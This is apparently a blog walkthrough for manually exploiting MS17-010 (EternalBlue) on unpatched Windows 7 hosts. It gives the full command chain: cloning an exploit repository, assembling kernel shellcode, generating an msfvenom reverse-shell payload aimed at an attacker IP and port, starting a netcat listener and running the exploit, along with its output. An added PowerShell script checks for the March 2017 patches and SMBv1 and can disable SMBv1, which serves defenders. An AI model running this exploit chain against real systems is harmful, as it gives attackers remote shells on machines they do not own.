MS17-010 - Exploiting Manually

Posted on Fri, Jul 1, 2022 (tag: windows)

Below is a step-by-step walkthrough for exploiting the MS17-010 vulnerability (EternalBlue/DoublePulsar).

We will use the exploits from the repository: https://github.com/worawit/MS17-010.git

  1. Cloning the repository
root@kali# git clone https://github.com/worawit/MS17-010.git
Cloning into 'MS17-010'...
remote: Enumerating objects: 183, done.
remote: Total 183 (delta 0), reused 0 (delta 0), pack-reused 183
Receiving objects: 100% (183/183), 113.61 KiB | 391.00 KiB/s, done.
Resolving deltas: 100% (102/102), done.
  2. Generating the payload (check the target platform: 64 or 32 bit)
root@kali# nasm -f bin MS17-010/shellcode/eternalblue_kshellcode_x64.asm -o \
           ./sc_x64_kernel.bin
  3. Shellcode (check the target platform: 64 or 32 bit)

root@kali# msfvenom -p windows/x64/shell_reverse_tcp LPORT=<PORTA_NC_ATACANTE> \
           LHOST=<IP_NC_ATACANTE> \
           --platform windows -a x64 --format raw -o sc_x64_payload.bin
No encoder or badchars specified, outputting raw payload
Payload size: 460 bytes
Saved as: sc_x64_payload.bin
  4. Joining the payload and the shellcode
root@kali# cat sc_x64_kernel.bin sc_x64_payload.bin > sc_x64.bin
  5. Exploiting
    a. In one terminal, start the listener on the reverse shell port chosen above

    root@kali# nc -lnvp <PORTA_NC_ATACANTE>

    b. Run the exploit

    root@kali# python MS17-010/eternalblue_exploit7.py <IP_MAQUINA_ALVO> sc_x64.bin
    shellcode size: 1232
    numGroomConn: 13
    Target OS: Windows 7 Professional 7601 Service Pack 1
    SMB1 session setup allocate nonpaged pool success
    SMB1 session setup allocate nonpaged pool success
    good response status: INVALID_PARAMETER
    done
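
The exploit output above shows what it depends on: an unpatched Windows 7 SP1 host with the SMBv1 server enabled. The following PowerShell script is an added example (not part of the original post or of the worawit repository) for checking a Windows 7 / Server 2008 R2 host for exactly that condition; it assumes it is run elevated on the host, and the KB numbers it looks for are Microsoft's March 2017 security-only (KB4012212) and monthly rollup (KB4012215) updates for that platform.

```powershell
# Added example (not from the original post): two signals a defender checks on a
# Windows 7 SP1 / 2008 R2 host for exposure to MS17-010. Assumption: run elevated.
$Ms17010Updates = @('KB4012212', 'KB4012215')   # security-only / monthly rollup
$LanmanKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'

function Get-Ms17010Exposure {
    # Get-HotFix only lists updates registered with the servicing stack; a later
    # cumulative rollup that supersedes these KBs will not show up here, so treat
    # "no KB found" as "verify manually", not as proof the host is unpatched.
    $installed = Get-HotFix |
        Where-Object { $Ms17010Updates -contains $_.HotFixID } |
        ForEach-Object { $_.HotFixID }

    # On Windows 7 the SMB1 server is controlled by this DWORD. If the value is
    # absent, SMBv1 is enabled, which is the default the exploit relies on.
    $smb1 = (Get-ItemProperty -Path $LanmanKey -Name SMB1 -ErrorAction SilentlyContinue).SMB1
    $smb1Enabled = ($smb1 -eq $null) -or ($smb1 -ne 0)

    New-Object PSObject -Property @{
        PatchFound  = [bool]$installed
        Patches     = ($installed -join ', ')
        Smb1Enabled = $smb1Enabled
        Exposed     = (-not $installed) -and $smb1Enabled
    }
}

function Disable-Smb1Server {
    # Microsoft's documented mitigation for Windows 7 / 2008 R2: set SMB1 = 0 and
    # restart the Server service (LanmanServer) so the change takes effect.
    Set-ItemProperty -Path $LanmanKey -Name SMB1 -Type DWORD -Value 0 -Force
    Restart-Service -Name LanmanServer -Force
}

$state = Get-Ms17010Exposure
$state | Format-List
if ($state.Exposed) {
    Write-Warning 'No MS17-010 update found and SMBv1 is enabled: apply the update and run Disable-Smb1Server.'
}
```

Disabling SMBv1 removes the attack surface but is not a substitute for the update; run both, and re-run the check afterwards.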

Below are some references I used that may be helpful:

MS17-010 EternalBlue Manual Exploitation

In this post we'll see how EternalBlue (MS17-010) can be exploited manually by compiling the payload from source and running it against a vulnerable target. This is useful in situations where Metasploit is not available or not an option, like running quick demos or exploiting from C2 hosts.

Exploiting MS17-010 without Metasploit (Win XP SP3)

In some ways this post is an aberration, I had intended to look do a post on exploiting the infamous MS08-067 without Metasploit but did not manage to get my hands on a Win XP VM with that vulnerability. This was after I was trying to do a PTP lab but was burning too many...